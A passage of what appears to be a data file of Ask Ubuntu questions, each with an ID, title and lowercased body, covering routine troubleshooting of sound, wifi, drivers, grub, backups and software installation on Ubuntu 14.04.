happened also while regular work ( without log out ) . always same keys do n't work - i , o , ctrl , maybe more .
511133	sound not working in laptop speakers . headphones fine	i am using ubuntu 14.04.1 lts on dell inspiron . i have hda-intel soundcard . for quite a few days now , my laptop sound is not coming from the speakers , and only from headphones . i have tried selecting the in-built speakers in pavucontrol both when the headphones were plugged in and were not . when headphones were plugged in , and i selected in-built speakers , the sound still came from the headphones . when not plugged in , there was no sound at all . i have tried reinstalling alsamixer , killing pulseaudio , changing volumes in alsamixer . nothing has worked so far . here are some screenshots of alsamixer . just after running alsamixer : not sure if the above is normal , since i have to change the soundcard first to get the next state : again i am not sure if there should be columns about headphones , since they are not plugged in . after plugging in the headphones , it changes to : which is not much of a change . just the speakers got muted . on disconnecting the speakers , they go back to 100 . please help . i have already seen other threads like this , but did n't get any answer that worked . thank you in advance edit : i have dual boot with windows 8 . so i know that it is not a hardware problem edit 2 : noticed something new . in alsamixer , whenever i mute the headphones ( 2nd column ) while unplugged , even the speaker and master columns are muted automatically . i do n't think this is a normal behavior . one more thing i should probably add : everytime i plug in the headphones , a new pop-up asks me if i have plugged in a headphone , headset or microphone . this did n't happen with my previous headphone . edit 3 : i have dual boot with windows 8.1 , but i did n't know that this was relevant to the problem .
511140	how can i get more granular control of unity scaling factor ?	in the displays section of the settings , unity has an option to set `` scale for menu and title bars '' . this option is presented as a slider with notches every .125 . however , i find that the optimal scaling factor for my display would be between two of these notches . how can i change it to something like 2.06 or 1.85 ?
511144	what is the problem in wubi.exe for ubuntu 14.04 lts ?	i downloaded ubuntu 14.04 lts desktop version for my windows 7 64-bit machine as there was no separate link on ubuntu site for only wubi.exe . the package had wubi.exe . i executed wubi.exe and on completing download , an error occured for 'permission denied. ' . i executed it as 'run as administrator ' , but even though , it is giving error again and again . there is no problem in my machine as i have installed ubuntu 12.04 lts many times on my computer using wubi.exe . please provide some possible solution . thanks in advance .
511146	which ubuntu to install on 32 bit machine having 4 gb ram	i have a 32 bit machine and had planned to install ubuntu 14.04 on it . i am confused because on the ubuntu download page it says 32 bit ( for machines less than 2 gb ram ) , since i have 4 gb of ram on my machine should i go ahead with installating the 64 bit . also what about the other applications should i need to install 32 bit or 64 bit version of the app ?
511149	how to setup ssl ( https ) for your site on ubuntu linux -- two way ssl	i have a website , the main requirement is to make that website secure by using https when the client access from a different machine it has to work only if the certificate had uploaded in the browser settings . if not it should deny the access to that website . can anyone help help me achieve this . i am using ubuntu 14.04 let me know if you people need any more details
511153	autoit alternate software\	is there any equivalent software to autoit is available for ubuntu ? i cant able to upload the files using selenium webdriver without autoit . autoit software only supports in windows . thanks in advance ... .
511158	viber and skype installs on my ubuntu 14.04 lts but does not run	i currently installed viber and skype on my system ( `` ubuntu 14.04 lts ( 64-bit ) '' but can not run the program , why ?
511160	no internet after installing ubuntu 14.04 on inspiron	i have installed ubuntu 14.04 alongside windows xp on an old dell inspiron 1521 . when i tried ubuntu from the pen drive , everything was peachy . however , after installing , internet does n't work . i 've tried to `` create connection '' by copying the mac adress from the ubuntu trial version , but it wo n't let me save them . it claims there are `` no network devices avilable '' . also , the system does n't shut down propperly . it stays on the purple ubuntu screen and shows the white dots blinking endlessly untill i turn the computer off manually .
511161	ubuntu 14.04 / desktop / startup	i'am using ubuntu 14.04 / desktop as a controller for our wifi service , to be able to run the controller sw i need to run the following command in terminal : java -jar desktop/unifi/lib/ace.jar start is it possible to run this command on starup in case the pc needs rebooting ? so i do n't need to run it every time after rebooting the system .
511164	getting web designers to use ubuntu	at my work , most windows pc 's are converted to ubuntu . but web designers still use windows because they need graphics editing software like photoshop . i wanted everyone use ubuntu for security . is there any alternative to photoshop on ubuntu ? i use gimp on my pc for basic photo editing ( mostly cropping print screen screenshots ) , but image is not very optimized like photoshop , i found there is a save for web plugin for gimp , but that wo n't work with current version of gimp provided with ubuntu 14.04 . i tried installing photoshop under wine , it installs , starts properly , but have lot of problem when editing images . already using sublime text for creating pages , it work perfectly on ubuntu , so only problem is image/photo editing side . anyone have experience in using ubuntu for web design ( not development ) ?
511174	can not open /dev/ttyusb0 : no such file or directory - modem usb huawei e353	i got usb modem huawei e353 with sim card . modem works on other computers , but when i try to use it on my comp , nothing happens ( the network is not visible on the list ) . modem lights up blue . i 've tried add the network manually on network manager > change connections > gsm > add > aero2 ( this network was visible on the list ) . so i was able to add it but not able to connect . result of lsubs : bus 002 device 005 : id 12d1:14fe huawei technologies co. , ltd . i 've tried to install wvdial , than 've edited : sudo nano /etc/wvdial.conf [ dialer defaults ] modem type = usb modem modem=/dev/ttyusb0 phone = *99 # username= ; $ init1 = ath $ init2 = atz $ ; init3 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 $ apn=darmowy $ carrier check = no $ dial command = atd $ stupid mode = 1 $ auto dns = 1 $ password = ; $ baud = 460800 [ dialer defaults ] phone = username = password = new pppd = yes unfortunately : -- > can not open /dev/ttyusb0 : no such file or directory file does not exist . what should i do ?
511175	using diff to compare a file and a directory	there is probably a simpler way to do this but i ran ls on the /media/user directory with no usb storage plugged in and saved the output to a file and i wanted to use diff to compare the file with a new usb plugged in and compare the file with the /media/user directory so that it detects the new directory in /media from the usb i 've used so far ls > usbmedia.diff diff /home/user/desktop/scripts/usbmedia.diff /media/user/ the output i get is no /media/user/usbmedia.diff file so it is looking for a file of the same name but how do i get the diff command to not do that and compare the directory with the file
511177	need mysql workbench for ubuntu 14.04	the latest mysql workbench 6.1.7 is still not available for 32-bit ( i386 ) ubuntu 14.04 . how can i set it up it with current release - 64-bit or a older version of ubuntu ?
511184	ca n't make ubuntu 14.04 use ati drivers anymore after last update	this if my first post here although i 'm an ubuntu user for more than 1 year ( thought not so much experience ) . so far i 've managed to get things working by simply reading around and applying suggestions but this time i feel i ca n't really get it working . a week ago i decided to give ubuntu 14.04 a try . so i installed it and then installed ati drivers from the xorg-edgers ppa . i have to say that my dell inspiron 7520 se with amd radem 7730 worked incredibly fast , i just could n't believe it . about 2 days ago , the automatic updater asked me to update the system , which i did as usual . after that obviously i rebooted but it did n't work anymore , it simply showed a black screen just before login . i tried dropping to command line but it 'd freeze . i finally managed to purge the fglrx via liveusb and could login back to my installed ubuntu 14.04 , tried reinstalling the drivers the same way but it wo n't work anymore , same black screen issue . anyone experienced the same thing lately ?
511186	how to clone hdd to usb flash	i want to upgrade to new ubuntu 14.04 i want to make clone as a backup before upgrading . i ca n't use normal backup , because after installing e4rat to 13.10 it will not boot anymore and while running with live usb stick , it will not let me copy or open files ( that are on my computer internal hdd ) , because i got password , that i can not put while running from live usb stick , i got files that i want to keep and in case that upgrading will not help , i still have possibility to try to get e4rat boot working on old ubuntu and save my files . this is why i want to clone . i got 120gb hdd on computer ( 24 gb used ) . i would like to clone it to usb memory stick ( 32gb ) dd did n't do it . i run my computer now with 13.10 from live usb stick ( 2gb ) and because stick is only 2gb , i can not download new 14.04 to make new stick for 14.04 boot . or is there any other way to open my files and copy them , before installing new ubuntu .
511187	would i get back all of hd memory if i remove partitioned-ubuntu from my windows system ?	i 've a system with this configuration : - dell vostro 1015 laptop built sept 2011 - intel core2 duo processor @ 2 ghz frequency - 64-bit memory - 320 gb hdd - integrated graphics - wifi & bluetooth enabled i 'm currently using windows 7 ultimate os since i bought it . i 'm fed up of using windows 7 on my system ( & windows 8 wont work ! ) so i wanted to install ubuntu 12.04 . i 've 2 questions : if i install it in partition with my current os , and then after some time , if i need to remove ubuntu from the system ( without removing windows ) , will i get back all the hdd memory used by the ubuntu os and make it accessible to the windows system ( again ) ? can i use both the operating systems in such a way that i can access the hard disk data equally among both the oses , that is , i can access the same hd data by both the oses ? ( p.s . : i do n't want to use virtual os software ) thanks in advance !
511188	suddenly can not connect through ethernet ( link up , not ip )	thinkpad t432 , kubuntu 14.04 , linux 3.13.0-34-generic i left for vacations , came back , and can not use my ethernet plug anymore . it is crucial for me at work . i can connect with windows . i can not connect with linux , either at home or at work . wireless works fine . my controller : ~ $ lspci 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) interestingly a link seems to be detected ~ $ ethtool eth1 settings for eth1 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : twisted pair phyad : 2 transceiver : internal auto-negotiation : on mdi-x : off ( auto ) can not get wake-on-lan settings : operation not permitted current message level : 0x00000007 ( 7 ) drv probe link link detected : yes but no lease ~ $ ifconfig eth1 link encap : ethernet hwaddr 28 : d2:44:47:65 : e5 inet6 addr : fe80 : :2ad2:44ff : fe47:65e5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:47559 errors:0 dropped:17 overruns:0 frame:0 tx packets:83 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5685292 ( 5.6 mb ) tx bytes:69625 ( 69.6 kb ) interrupt:20 memory : f3900000-f3920000 i am a bit lost : - (
511189	ubuntu software center does not work	i have recently installed ubuntu 14.04 and if i click on ubuntu software center icon it opens for like few seconds and close . when i want to install application from website , like scribus , ubuntu software center opens but nothing is being done . can you help me out somehow ? `` software-center '' output : bastian @ bastian-vpccb3m1e : ~ $ software-center 2014-08-14 19:26:19,712 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-08-14 19:26:20,661 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-08-14 19:26:20,663 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-08-14 19:26:20,668 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-08-14 19:26:20,668 - root - error - could not find any typelib for launchpadintegration 2014-08-14 19:26:20,721 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 155 , in open self._list.read_main_list ( ) systemerror : e : nieprawidłowa linia 57 w liście źródeł /etc/apt/sources.list ( analiza uri ) 2014-08-14 19:26:21,542 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1378 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1316 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
511191	how do i sign ubuntu code of conduct with specific openpgp key ?	i have four openpgp keys , i need to sign the ubuntu code of conduct with a specific openpgp key . how do i make one of the openpgp key is default so i can sign the code with that key ?
511192	problem in update	i am bit new to ubuntu . every day softer updater shows update and when i click install it does it work . but i do n't why , when i tried to update it show the message not enough free disk space . i think disk space doesnât mean hard-disk space because it is almost empty . how can i get free disk space , means what should i do ?
511194	apache server path location in debian	i 'd installed koha integrated library system using pre-made image through a virtual box . i want to find the path location of my apache server so that i can manipulate/modify the files for my customization . any help would be very much appreciated . thanks . edit : i tried to run the following code : grep documentroot /etc/apache2/sites-enabled/ -r but an output shows : /etc/apache2/sites-enabled/000-default : documentroot /var/www grep : etc/apache2/sites-enabled/mathlibrary : permission denied am i doing the right thing ?
511195	how to hide new created user in /etc/passwd in linux ?	i have created new user named `` testuser '' in linux system . after that i used `` cut -d : -f1 /etc/passwd '' cammand to show user list in system . now i can see all users including new created user `` testuser '' . i want to hide `` testuser '' from /etc/passwd . is there any solution for this ? thanks ,
511199	how do i install ubuntu server os without internet ?	i donwloaded ubuntu server 14 . i tried to install the server on my desktop and i get this error `` bad archive mirror '' . i tried skipping the step but the system still brings me back to this error . someone please help .
511200	upgrading ubuntu 12.04 lts to 14.04 lts : legacy ppa upgrade	i 'd like to upgrade my server from ubuntu 12.04 lts to 14.04 lts . however i have a small number of 3rd party applications , looking at their ppa list i foresee i could have trouble . so i am here to ask which is the safest migration path . a quick list : ls /etc/apt/sources.list.d nginx-stable-precise.list nginx-stable-precise.list.save ondrej-mysql-experimental-precise.list ondrej-mysql-experimental-precise.list.save ondrej-php5-precise.list ondrej-php5-precise.list.save considering i see `` precise '' in the above listing , do i have to do something particular in order to have those ppas switched over to their `` trusty '' version ? or shall ubuntu be so smart to detect that and deal with it ? i have checked and all those ppas have a corresponding `` trusty '' distro version available . or , do i have to manually remove the ppa references in apt , upgrade to 14.04 and then add the ppas again ? what i am asking is really a checklist about what to do before and after the upgrade in order to not break anything . finally , what if i wanted to stop using the ppa version of say nginx and just use the 14.04 bundled native nginx ? do i just remove the ppa reference before the upgrade or what ? thanks in advance
511205	how to delete a file from the opening dialogue of libreoffice ?	one handy thing on windows was , that i could delete files from the opening dialogue of openoffice via keyboard delete key . libreoffice on ubuntu does unfortunately seem to lack this functionality and i 'm not sure if openoffice would have it under ubuntu as well . is there a workaround ?
511208	what would happen if i installed a ubuntu with md5 hashes that are different fom the intended ones	what would happen if i installed ubuntu with md5 hashes that do not match the intended ones .
511209	strange sound problem	i used to have an old windows xp but it was very slow , so my boyfriend installed ubuntu instead of windows xp , but now i have a strange sound problem which was n't in windows xp . when i play music , for example songs in youtube , or even song or movie files , it works fine most of the song , but every 1 minute or less , there is suddenly a strange noise which disturbs the song . the noise sounds like the noise you hear when there is no reception in the car 's radio . after 5 min the noise disappears and the song continues . the problem occurs since ubuntu was installed . the same songs works great on my other computer ( windows 8 ) , and used to work in windows xp on the current computer .
511210	13.10 to 14.04 : filesystem mount failed : how get to maintenance shell ?	while upgrading from 13.10 to 14.04 we got a power cut : when we restarted the machine we got a system fail ; i 'm getting the readout below : 'filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored . enter root password or control-d to continue maintenance . ' question : how do i get to maintenance shell stage ?
511213	grub rescue after format hard drive	i installed lubuntu over windows xp but now i wanted to go back to xp because the lubuntu distro is slowing down my old pc . here i messed up everything . the windows xp installation cd did n't boot at all so i used gparted live to format my hard disk and start over . but now it enter the grub rescue mode and shows the following message error : unknown filesystem entering rescue mode.. grub rescue > and if i try to set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal it gives error : non such partition could you help ? i 'm not pro as you can see from the mess i 've done . i 've got a gparted live cd , a lubuntu installation cd and a win xp oem installation cd . many thanks as
511214	why do i get “value of key 'comment ' is empty” in my app review ?	i uploaded a ubuntu sdk app for review on https : //myapps.developer.ubuntu.com and the review is pending , because there are errors . one is the following : '' desktop_validates ( iamonair ) '' : { '' link '' : `` http : //askubuntu.com/questions/417377/what-does-desktop-validates-mean/417378 '' , '' text '' : `` did not validate : ( validationerror in file '/tmp/clickreview-aahtrot5/iamonair.desktop ' : \n- value of key 'comment ' is empty ) '' } } , in particular , it explains that my .desktop is incorrect , that the “comment” section is incomplete . though , it seems to me that i did fill this field , as here is my said .desktop file : [ desktop entry ] name=i am on air comment=listen to the latest episodes of hardwell 's official podcast , hardwell on air exec=/usr/bin/qmlscene $ @ /usr/share/iamonair/iamonair.qml icon=images/256.jpg terminal=false type=application categories=audio ; music ; player x-ubuntu-touch=true i have read some parts of the freedesktop specifications as suggested by another ask ubuntu question , but it did n't help . could you please tell me what i should fix ?
511215	trying to install ncview on ubuntu 12.04	the package ncview requires x development headers and headers . on ubuntu 12.04 i tried the following command sudo apt-get install xorg-dev and i got the below error message . this looks like a very long list of packages . is there something i am missing ? reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xorg-dev : depends : libdmx-dev but it is not going to be installed depends : libfs-dev but it is not going to be installed depends : libx11-dev but it is not going to be installed depends : libxaw7-dev but it is not going to be installed depends : libxcomposite-dev but it is not going to be installed depends : libxcursor-dev but it is not going to be installed depends : libxdamage-dev but it is not going to be installed depends : libxext-dev but it is not going to be installed depends : libxfixes-dev but it is not going to be installed depends : libxfont-dev but it is not going to be installed depends : libxft-dev but it is not going to be installed depends : libxi-dev but it is not going to be installed depends : libxinerama-dev but it is not going to be installed depends : libxkbfile-dev but it is not going to be installed depends : libxmu-dev but it is not going to be installed depends : libxmuu-dev but it is not going to be installed depends : libxpm-dev but it is not going to be installed depends : libxrandr-dev but it is not going to be installed depends : libxrender-dev but it is not going to be installed depends : libxres-dev but it is not going to be installed depends : libxss-dev but it is not going to be installed depends : libxt-dev but it is not going to be installed depends : libxtst-dev but it is not going to be installed depends : libxv-dev but it is not going to be installed depends : libxvmc-dev but it is not going to be installed depends : libxxf86dga-dev but it is not going to be installed depends : libxxf86vm-dev but it is not going to be installed depends : xserver-xorg-dev but it is not going to be installed
511216	unable to connect externally to apache subversion	i 've create an apache subversion using this link http : //rbgeek.wordpress.com/2012/05/01/svn-server-on-ubuntu-12-04-lts-with-web-access/ was able to access the repo using tortoisesvn internally from my network . but when i try to access it externally from the outside network it wont load . the ubuntu os is a virtual machine , has been set as bridged network . i have already forwarded my port to the ip address and disable all my firewall . can anyone help ?
511220	map an action to 'hold key '	thanks to compizconfig , i can map pretty much action i want to a keyboard shortcut . but i ca n't choose a shortcut that implies holding a key for a certain time . i think there must be a way to do it , because the 'keyboard shortcuts ' window appears when holding 'super ' for some time . but i did n't find it in compiz . can i map an action to 'hold key x ' ?
511227	using the iniparser : linker error	i've download the inparser library , and i 'm trying to use the lib , by running its test program : gcc iniexqample.c -o o -liniparser.a just like the documentation said . but i get this error : /usr/bin/ld : can not find -liniparser.a collect2 : error : ld returned 1 exit status i 've run exactly the the installation steps , and copied the the output file : libparser.a and libiniparser.so.0 into usr/bin/ i do n't understand what the error message means , and how its possible to solve it . any idea ? by the way i 'm using ubuntu14.04
511228	save `` apt-get '' apps onto a usb	i 'm running ubuntu live off a usb , i do not want to install it though . on the same usb i have a second partition to save files on . how would i save 'apt-get install * ' and software store apps onto my second patition ? thank you !
511230	digital vibrance problem	i have nvidia optimus graphic card : erkanmdr @ helyx : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 630m ] ( rev ff ) i am using nvidia-prime driver : erkanmdr @ helyx : ~ $ dpkg -l | grep nvidia ii nvidia-331 331.38-0ubuntu7.1 amd64 nvidia binary driver - version 331.38 ii nvidia-libopencl1-331 331.38-0ubuntu7.1 amd64 nvidia opencl driver and icd loader library ii nvidia-opencl-icd-331 331.38-0ubuntu7.1 amd64 nvidia opencl icd ii nvidia-prime 0.6.2 amd64 tools to enable nvidia 's prime ii nvidia-settings 331.20-0ubuntu8 amd64 tool for configuring the nvidia graphics driver need a bit of digital vibrance to increase . like this : . how can i do it ? ( in nvidia-settings 's digital vibrance setting does not work )
511231	how can i remove jdownloader ?	how can i remove jdownloader ? i installed it by the following process : sudo apt-add-repository ppa : jd-team/jdownloader sudo apt-get update sudo apt-get install jdownloader
511232	loading gcc created shared libraray in eclipse with four additional java files ( swig )	in my architecture components used ( swig 3.0 , gcc 4 , jdk 1.7 , eclipse luna ) . 1.converting c code to java done using swig . 2.my c file name and interface file name are xyz.c , xyz.i and by running swig -java xyz.i i got xyz_wrap.c . 3.using gcc i created shared library with xyz.c and xyz_wrap.c =libxyz.so , now in command line i created one java file named test.java where in java file i just called system.loadlibrary ( `` xyz '' ) and straight forward , i referred to the swig examples to do this . i followed same way as they explained calling a c function in java file xyz.adding ( 2,3 ) and i got output correctly . 4 the actual problem starts when i want load the same libxyz.so in eclipse . i am sorry i am failing to do this , if i add it works as it is it worked in command line or how to link a libxyz.so please explain me steps i am new to eclipse .
511234	where to “ -- exclude” the specific directory 's in mine backup script using tar	i want to backup my whole linux server but where do i -- exclude=proc -- exclude=sys -- exclude=dev/pts -- exclude=/var/backups . please help ! ! ! here is my code . i may also have some errors in it . feedback is welcome ... .. # ! bin/bash # purpose = backup of var directory time=`date + '' % b- % d- % y '' ` # this command will add date in backup file name . filename= '' backup- $ time.tar.gz '' # here i define backup file name format . srcdir= '' / `` # location of important data directory ( source of backup ) . desdir= '' /var/backups/fullbackup '' # destination of backup file . logsys= '' /var/log/fullbackup '' # log files of the backup . echo `` starting backup of $ srcdir to $ desdir on $ time '' > > $ { logsys } tar -cpzf $ desdir/ $ filename $ srcdir echo `` ending backup of $ srcdir on $ time '' > > $ { logsys } # end
511237	grub2 icons question	every time grub updates , due to normal updates , i lose some icons on the grub menu . i have to manually edit the /boot/grub/grub.cfg file and add ' -- class ubuntu ' ( or whatever ) to lines that no longer have a ' -- class ' entry and hence display no icon . where , exactly , does grub get the instruction to write a ' -- class ' entry into the grub.cfg file ? i have looked at templates but ca n't see anything obvious . i have read a few online grub guides but i 'm finding it heavy going so thought i would ask for help ! ( ubuntu 14.04 lts )
511240	unable to calibrate lg l1730sf with usb connection on ubuntu 14.04	i 'm trying to calibrate my lg l1730sf usb touch screen with ubuntu 14.04 . if i run the `` calibrate touchscreen '' application and follow the steps needed , it does n't calibrate . i also looked at this thread : can not calibrate touchscreen , but no luck . can someone help me on this one ? thierry
511241	my ubuntu boot stick , created in startup disk creator on ubuntu , does not work on my ubuntu machine	i used the built-in startup disk creator tool to creat the disk , using a 4g sandisk cruzer . when i start my ubuntu machine with this boot stick in , it boots my usual ubuntu , and not from the usb stick . i have set the usb stick to be the first boot option in the bios setup . first , i tried unetbootin , but it is mentioned , in passing , in one place on the unetbootin web page , that boot sticks created with unetbootin only work on windows machines . is this true for boot sticks created with startup disk creator as well ? if not , what am i doing wrong ?
511244	how to automount new sata hdd / usb devices at startup without fstab	in my xubuntu sata disk partitions is not automounted . i have to go to partition and only then it 's mounted . and its not good for me , it have to be already automounted without me going to that partition . am using xbmc and such partitions is not visible in lists . also it 's read only and i want that all partitions to be writable for all users . openelec doesnt use fstab and all disks are automounted i want the same feature in my xubuntu . anyone knows how does openelec does that ?
511248	use updated version of firefox	i was using firefox 28.0 on ubuntu 14.04 . so i went to the firefox website and downloaded the latest version of firefox . i then extracted and ran firefox . however when i type firefox in the search box and open it still opens the older version ? what do i have to do to reflect the changes ?
511250	volume mutes when set below ~20 % 14.04	since updating to 14.04 , i 'm unable to set a lower volume . according to the alsamixer , it automatically mutes when i try to go below 18 % . how can i restore access to the quieter volumes ? ubuntu 14.04 running on a dell inspiron 1501
511255	intel dual band wireless-ac 7260 keeps dropping wifi	my wifi intel dual band wireless-ac 7260 keeps dropping wificonnection drops and the network to which i was connected disappears from the list of available networks in network manager . the only way to fix it is to disable wifi and re-enable it how can i fix this . i 'm using ubuntu 14.04 64bit . it mostly drops connections on the 5ghz network . my other devices do n't drop connections over wifi . see logs and versions rt @ simon : ~ $ uname -a linux simon 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux rt @ simon : ~ $ rt @ simon : ~ $ dmesg | grep iwl [ 3.370777 ] iwlwifi 0000:03:00.0 : irq 46 for msi/msi-x [ 3.381089 ] iwlwifi 0000:03:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 3.414637 ] iwlwifi 0000:03:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 [ 3.414695 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s [ 3.414913 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s [ 3.630208 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' [ 9.304838 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s [ 9.305068 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s [ 605.483174 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s [ 605.483396 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s rt @ simon : ~ $ cat /var/log/syslog | grep -e iwl -e 80211 | tail -n25 aug 14 08:13:02 simon kernel : [ 3.452780 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:13:02 simon kernel : [ 3.630208 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' aug 14 08:13:06 simon networkmanager [ 1125 ] : < info > rfkill1 : found wifi radio killswitch ( at /sys/devices/pci0000:00/0000:00:1c.2/0000:03:00.0/ieee80211/phy0/rfkill1 ) ( driver iwlwifi ) aug 14 08:13:06 simon networkmanager [ 1125 ] : < info > ( wlan0 ) : using nl80211 for wifi device control aug 14 08:13:06 simon networkmanager [ 1125 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'iwlwifi ' ifindex : 3 ) aug 14 08:13:06 simon kernel : [ 9.304838 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s aug 14 08:13:06 simon kernel : [ 9.305068 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s aug 14 08:14:18 simon kernel : [ 81.230162 ] cfg80211 : calling crda to update world regulatory domain aug 14 08:14:18 simon kernel : [ 81.232330 ] cfg80211 : world regulatory domain updated : aug 14 08:14:18 simon kernel : [ 81.232332 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) aug 14 08:14:18 simon kernel : [ 81.232333 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:14:18 simon kernel : [ 81.232334 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:14:18 simon kernel : [ 81.232335 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:14:18 simon kernel : [ 81.232336 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:14:18 simon kernel : [ 81.232337 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:23:02 simon kernel : [ 605.483174 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s aug 14 08:23:02 simon kernel : [ 605.483396 ] iwlwifi 0000:03:00.0 : l1 disabled ; enabling l0s aug 14 08:23:18 simon kernel : [ 621.223905 ] cfg80211 : calling crda to update world regulatory domain aug 14 08:23:18 simon kernel : [ 621.228945 ] cfg80211 : world regulatory domain updated : aug 14 08:23:18 simon kernel : [ 621.228950 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) aug 14 08:23:18 simon kernel : [ 621.228954 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:23:18 simon kernel : [ 621.228956 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:23:18 simon kernel : [ 621.228959 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:23:18 simon kernel : [ 621.228961 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) aug 14 08:23:18 simon kernel : [ 621.228963 ] cfg80211 : ( 5735000 khz 